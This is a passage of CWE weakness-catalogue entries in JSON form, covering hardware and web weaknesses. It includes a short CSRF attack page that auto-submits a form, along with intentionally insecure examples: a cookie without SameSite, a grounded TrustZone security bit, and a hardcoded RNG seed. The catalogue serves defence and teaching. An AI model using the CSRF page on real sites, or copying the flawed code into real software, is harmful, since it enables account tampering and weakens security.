Credential Sharing","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information.","Extended_Description":{"xhtml:p":"\u201cUnlocking a device\u201d often means activating certain, unadvertised, debug and manufacturer-specific capabilities of a device using sensitive credentials. Unlocking a device might be necessary for the purpose of troubleshooting device problems. For example, suppose a device contains the ability to dump the content of the full system memory by disabling the memory-protection mechanisms. Since this is a highly security-sensitive capability, this capability is \u201clocked\u201d in the production part. Unless the device gets unlocked by supplying the proper credentials the debug capabilities are not available. For cases where the chip designer, chip manufacturer (fabricator), and manufacturing and assembly testers are the all employed by the same company, the compromise of the credentials are greatly reduced. However, when the chip designer is employed by one company, the chip manufacturer is employed by another company (a foundry), and the assemblers and testers are employed by yet a third company. Since these different companies will need to perform various tests on the device to verify correct device function, they all need to share the unlock key. Unfortunately, the level of secrecy and policy might be quite different at each company, greatly increasing the risk of sensitive credentials being compromised."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Integration"},{"Phase":"Manufacturing"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Modify Memory","Read Memory","Modify Files or Directories","Read Files or Directories","Modify Application Data","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"Once unlock credentials are compromised, an attacker can use the credentials to unlock the device and gain unauthorized access to the hidden functionalities protected by those credentials."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Integration","Description":"Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific."},{"Phase":"Manufacturing","Description":"Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows how an attacker can take advantage of compromised credentials.","Example_Code":[{"#text":"Suppose a semiconductor chipmaker, \u201cC\u201d, uses the foundry \u201cF\u201d for fabricating its chips. Now, F has many other customers in addition to C, and some of the other customers are much smaller companies. F has dedicated teams for each of its customers, but somehow it mixes up the unlock credentials and sends the unlock credentials of C to the wrong team. This other team does not take adequate precautions to protect the credentials that have nothing to do with them, and eventually the unlock credentials of C get leaked.","attr":{"@_Nature":"bad"}},{"#text":"Vertical integration of a production company is one effective method of protecting sensitive credentials. Where vertical integration is not possible, strict access control and need-to-know are methods which can be implemented to reduce these risks.","attr":{"@_Nature":"good"}}],"Body_Text":"When the credentials of multiple organizations are stored together, exposure to third parties occurs frequently."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"560"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"}}},"1274":{"attr":{"@_ID":"1274","@_Name":"Improper Access Control for Volatile Memory Containing Boot Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory.","Extended_Description":{"xhtml:p":["Adversaries could bypass the secure-boot process and execute their own untrusted, malicious boot code.","As a part of a secure-boot process, the read-only-memory (ROM) code for a System-on-Chip (SoC) or other system fetches bootloader code from Non-Volatile Memory (NVM) and stores the code in Volatile Memory (VM), such as dynamic, random-access memory (DRAM) or static, random-access memory (SRAM). The NVM is usually external to the SoC, while the VM is internal to the SoC. As the code is transferred from NVM to VM, it is authenticated by the SoC\'s ROM code.","If the volatile-memory-region protections or access controls are insufficient to prevent modifications from an adversary or untrusted agent, the secure boot may be bypassed or replaced with the execution of an adversary\'s code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This weakness can be introduced during hardware architecture or design but can be identified later during testing."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Ensure the volatile memory is lockable or has locks. Ensure the volatile memory is locked for writes from untrusted agents or adversaries. Try modifying the volatile memory from an untrusted agent, and ensure these writes are dropped.","Effectiveness":"High"},{"Method":"Manual Analysis","Description":{"xhtml:p":["Analyze the device using the following steps:","Only trusted masters should be allowed to write to the memory regions. For example, pluggable device peripherals should not have write access to program load memory regions."],"xhtml:ul":{"xhtml:li":["1) Identify all fabric master agents that are active during system Boot Flow when initial code is loaded from Non-volatile storage to volatile memory.","2) Identify the volatile memory regions that are used for storing loaded system executable program.","3) During system boot, test programming the identified memory regions in step 2 from all the masters identified in step 1."]}},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that the design of volatile-memory protections is enough to prevent modification from an adversary or untrusted code."},{"Phase":"Testing","Description":"Test the volatile-memory protections to ensure they are safe from modification or untrusted code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A typical SoC secure boot\'s flow includes fetching the next piece of code (i.e., the boot loader) from NVM (e.g., serial, peripheral interface (SPI) flash), and transferring it to DRAM/SRAM volatile, internal memory, which is more efficient.","Example_Code":[{"#text":"The volatile-memory protections or access controls are insufficient.","attr":{"@_Nature":"bad"}},{"#text":"A good architecture should define appropriate protections or access controls to prevent modification by an adversary or untrusted agent, once the bootloader is authenticated.","attr":{"@_Nature":"good"}}],"Body_Text":"The memory from where the boot loader executes can be modified by an adversary."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-2267","Description":"Locked memory regions may be modified through other interfaces in a secure-boot-loader image due to improper access control.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2267"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"},"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"suggested content improvements"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided detection method"}]}},"1275":{"attr":{"@_ID":"1275","@_Name":"Sensitive Cookie with Improper SameSite Attribute","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The SameSite attribute for sensitive cookies is not set, or an insecure value is used.","Extended_Description":"The SameSite attribute controls how cookies are sent for cross-domain requests. This attribute may have three values: \'Lax\', \'Strict\', or \'None\'. If the \'None\' value is used, a website may create a cross-domain POST HTTP request to another website, and the browser automatically adds cookies to this request. This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"352","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness occurs during implementation when the coder does not properly set the SameSite attribute."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Non-Repudiation","Access Control"],"Impact":"Modify Application Data","Likelihood":"Low","Note":"If the website does not impose additional defense against CSRF attacks, failing to use the \'Lax\' or \'Strict\' values could increase the risk of exposure to CSRF attacks. The likelihood of the integrity breach is Low because a successful attack does not only depend on an insecure SameSite attribute. In order to perform a CSRF attack there are many conditions that must be met, such as the lack of CSRF tokens, no confirmations for sensitive actions on the website, a \\"simple\\" \\"Content-Type\\" header in the HTTP request and many more."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Set the SameSite attribute of a sensitive cookie to \'Lax\' or \'Strict\'. This instructs the browser to apply this cookie only to same-domain requests, which provides a good Defense in Depth against CSRF attacks. When the \'Lax\' value is in use, cookies are also sent for top-level cross-domain navigation via HTTP GET, HEAD, OPTIONS, and TRACE methods, but not for other HTTP methods that are more like to cause side-effects of state mutation.","Effectiveness":"High","Effectiveness_Notes":"While this mitigation is effective for protecting cookies from a browser\'s own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a cookie is used to store a session ID for a client\'s interaction with a website. The snippet of code below establishes a new cookie to hold the sessionID.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"let sessionId = generateSessionId()let cookieOptions = { domain: \'example.com\' }response.cookie(\'sessionid\', sessionId, cookieOptions)","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;html&gt;","xhtml:div":{"#text":"&lt;form id=evil action=\\"http://local:3002/setEmail\\" method=\\"POST\\"&gt;&lt;input type=\\"hidden\\" name=\\"newEmail\\" value=\\"abc@example.com\\" /&gt;&lt;/form&gt;&lt;script&gt;evil.submit()&lt;/script&gt;&lt;/html&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"let sessionId = generateSessionId()let cookieOptions = { domain: \'example.com\', sameSite: \'Strict\' }response.cookie(\'sessionid\', sessionId, cookieOptions","xhtml:br":["",""]}}],"Body_Text":["Since the sameSite attribute is not specified, the cookie will be sent to the website with each request made by the client. An attacker who can potentially perform CSRF attack by using the following malicious page:","When the client visits this malicious web page, it submits a \'/setEmail\' POST HTTP request to the vulnerable website. Since the browser automatically appends the \'sessionid\' cookie to the request, the website automatically performs a \'setEmail\' action on behalf of the client.","To mitigate the risk, use the sameSite attribute of the \'sessionid\' cookie set to \'Strict\'."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"62"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1104"}},{"attr":{"@_External_Reference_ID":"REF-1105"}},{"attr":{"@_External_Reference_ID":"REF-1106"}}]},"Content_History":{"Submission":{"Submission_Name":"Michael Stepankin","Submission_Organization":"Veracode","Submission_Date":"2020-06-19"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"}}},"1276":{"attr":{"@_ID":"1276","@_Name":"Hardware Child Block Incorrectly Connected to Parent System","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Signals between a hardware IP and the parent system design are incorrectly connected causing security risks.","Extended_Description":{"xhtml:p":"Individual hardware IP must communicate with the parent system in order for the product to function correctly and as intended. If implemented incorrectly, while not causing any apparent functional issues, may cause security issues. For example, if the IP should only be reset by a system-wide hard reset, but instead the reset input is connected to a software-triggered debug mode reset (which is also asserted during a hard reset), integrity of data inside the IP can be violated."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness is introduced when integrating IP into a parent design."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"System-level verification may be used to ensure that components are correctly connected and that design security requirements are not violated due to interactions between various IP blocks."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Many SoCs use hardware to partition system resources between trusted and un-trusted entities. One example of this concept is the Arm TrustZone, in which the processor and all security-aware IP attempt to isolate resources based on the status of a privilege bit. This privilege bit is part of the input interface in all TrustZone-aware IP. If this privilege bit is accidentally grounded or left unconnected when the IP is instantiated, privilege escalation of all input data may occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:p":["// IP definition","module tz_peripheral(clk, reset, data_in, data_in_security_level, ...);",{"#text":"input clk, reset;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input [31:0] data_in;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input data_in_security_level;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule","// Instantiation of IP in a parent system","module soc(...)",{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},{"#text":"tz_peripheral u_tz_peripheral(","attr":{"@_style":"text-indent: 15px;"}},{"#text":".clk(clk),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".rst(rst),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in(rdata),","attr":{"@_style":"text-indent: 30px;"}},{"#text":"//Copy-and-paste error or typo grounds data_in_security_level (in this example 0=secure, 1=non-secure) effectively promoting all data to \u201csecure\u201d)","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in_security_level(1\'b0),","attr":{"@_style":"text-indent: 30px;"}},{"#text":");","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule"]},{"attr":{"@_Nature":"good","@_Language":"Verilog"},"xhtml:p":["// Instantiation of IP in a parent system","module soc(...)",{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},{"#text":"tz_peripheral u_tz_peripheral(","attr":{"@_style":"text-indent: 15px;"}},{"#text":".clk(clk),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".rst(rst),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in(rdata),","attr":{"@_style":"text-indent: 30px;"}},{"#text":"// This port is no longer grounded, but instead drive by the appropriate signal","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in_security_level(rdata_security_level),","attr":{"@_style":"text-indent: 30px;"}},{"#text":");","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule"]}],"Body_Text":"In the Verilog code below, the security level input to the TrustZone aware peripheral is correctly driven by an appropriate signal instead of being grounded."}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-22"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations"},"Previous_Entry_Name":{"#text":"Hardware Block Incorrectly Connected to Larger System","attr":{"@_Date":"2020-08-20"}}}},"1277":{"attr":{"@_ID":"1277","@_Name":"Firmware Not Updateable","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not provide its\\n\\t\\t\\tusers with the ability to update or patch its\\n\\t\\t\\tfirmware to address any vulnerabilities or\\n\\t\\t\\tweaknesses that may be present.","Extended_Description":"Without the ability to\\n\\t\\t\\tpatch or update firmware, consumers will be\\n\\t\\t\\tleft vulnerable to exploitation of any known\\n\\t\\t\\tvulnerabilities, or any vulnerabilities that\\n\\t\\t\\tare discovered in the future. This can expose\\n\\t\\t\\tconsumers to permanent risk throughout the\\n\\t\\t\\tentire lifetime of the device, which could be\\n\\t\\t\\tyears or decades. Some external protective\\n\\t\\t\\tmeasures and mitigations might be employed to\\n\\t\\t\\taid in preventing or reducing the risk of\\n\\t\\t\\tmalicious attack, but the root weakness cannot\\n\\t\\t\\tbe corrected.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1329","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Requirements","Note":"Requirements development might not consider the importance of updates over the lifetime of the product, or might not choose the ability due to concerns such as expense or speed to market."},{"Phase":"Architecture and Design","Note":"Lack of planning during architecture development and design, or external pressures such as speed to market, could ignore the capability to update."},{"Phase":"Implementation","Note":"The weakness can appear through oversight during implementation."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Likelihood":"Medium","Note":"If an attacker can identify an exploitable vulnerability in one device that has no means of patching, the attack may be used against an entire class of devices."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Create a new installable boot image of the current build with a minor version number change. Use the standard installation method to update the boot image. Verify that the minor version number has changed. Create a fake image. Verify that the boot updater will not install the fake image and generates an invalid image error message.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Check the consumer or maintainer documentation, the architecture/design documentation, or the original requirements to ensure that the documentation includes details for how to update the firmware.","Effectiveness":"Moderate"},{"Method":"Manual Dynamic Analysis","Description":"Determine if there is a lack of a capability to update read-only memory structure. This could manifest as a difference between the latest firmware version and current version within the device.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify requirements to provide the ability to update the firmware."},{"Phase":"Architecture and Design","Description":"Design the device to allow for updating the firmware."},{"Phase":"Implementation","Description":"Implement the necessary functionality to allow the firmware to be updated."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-145"},"Intro_Text":"A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes.","Example_Code":[{"#text":"The refrigerator has no means of patching and is hacked becoming a spewer of email spam.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The device automatically patches itself and provides considerable more protection against being hacked.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-9054","Description":"Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are \\"end-of-support\\" and cannot be patched (CWE-1277). [REF-1097]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9054"},{"Reference":"REF-1095","Description":"hardware \\"smart lock\\" has weak key generation, allowing attackers to steal the key by BLE sniffing, but the device\'s firmware cannot be upgraded [REF-1095].","Link":"https://www.theregister.com/2019/12/11/f_secure_keywe/"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1095"}},{"attr":{"@_External_Reference_ID":"REF-1096"}},{"attr":{"@_External_Reference_ID":"REF-1097"}}]},"Notes":{"Note":{"#text":"The \\"firmware\\" term does not have a single commonly-shared definition, so there may be variations in how this CWE entry is interpreted during mapping.","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Paul A. Wortman","Contribution_Organization":"Wells Fargo","Contribution_Date":"2021-10-12","Contribution_Comment":"provided detection methods and observed examples"}}},"1278":{"attr":{"@_ID":"1278","@_Name":"Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy.","Extended_Description":{"xhtml:p":["The physical structure of a device, viewed at high enough magnification, can reveal the information stored inside. Typical steps in IC reverse engineering involve removing the chip packaging (decapsulation) then using various imaging techniques ranging from high resolution x-ray microscopy to invasive techniques involving removing IC layers and imaging each layer using a scanning electron microscope.","The goal of such activities is to recover secret keys, unique device identifiers, and proprietary code and circuit designs embedded in hardware that the attacker has been unsuccessful at accessing through other means. These secrets may be stored in non-volatile memory or in the circuit netlist. Memory technologies such as masked ROM allow easier to extraction of secrets than One-time Programmable (OTP) memory."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Varies by Context","Note":"A common goal of malicious actors who reverse engineer ICs is to produce and sell counterfeit versions of the IC."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"The cost of secret extraction via IC reverse engineering should outweigh the potential value of the secrets being extracted. Threat model and value of secrets should be used to choose the technology used to safeguard those secrets. Examples include IC camouflaging and obfuscation, tamper-proof packaging, active shielding, and physical tampering detection information erasure."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider an SoC design that embeds a secret key in read-only memory (ROM). The key is baked into the design logic and may not be modified after fabrication causing the key to be identical for all devices.  An attacker in possession of the IC can decapsulate and delayer the device. After imaging the layers, computer vision algorithms or manual inspection of the circuit features locate the ROM and reveal the value of the key bits as encoded in the visible circuit structure of the ROM."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1092"}},{"attr":{"@_External_Reference_ID":"REF-1129"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements. It is more attack-oriented, so it might be more suited for CAPEC.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-20"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"1279":{"attr":{"@_ID":"1279","@_Name":"Cryptographic Operations are run Before Supporting Units are Ready","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result.","Extended_Description":"Many cryptographic hardware units depend upon other hardware units to supply information to them to produce a securely encrypted result. For example, a cryptographic unit that depends on an external random-number-generator (RNG) unit for entropy must wait until the RNG unit is producing random numbers. If a cryptographic unit retrieves a private encryption key from a fuse unit, the fuse unit must be up and running before a key may be supplied.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"The decision to continue using a cryptographic unit even though the input units to it are not producing valid data will compromise the encrypted result."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Integrity","Availability","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Best practices should be used to design cryptographic systems."},{"Phase":"Implementation","Description":"Continuously ensuring that cryptographic inputs are supplying valid information is necessary to ensure that the encrypted output is secure."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following pseudocode illustrates the weak encryption resulting from the use of a pseudo-random-number generator output.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["If random_number_generator_self_test_passed() == TRUE","then Seed = get_random_number_from_RNG()","else Seed = hardcoded_number"]},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["If random_number_generator_self_test_passed() == TRUE","then Seed = get_random_number_from_RNG()","else enter_error_state()"]}],"Body_Text":"In the example above, first a check of RNG ready is performed. If the check fails, the RNG is ignored and a hard coded value is used instead. The hard coded value severely weakens the encrypted output."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Cryptographic Primitives used without Successful 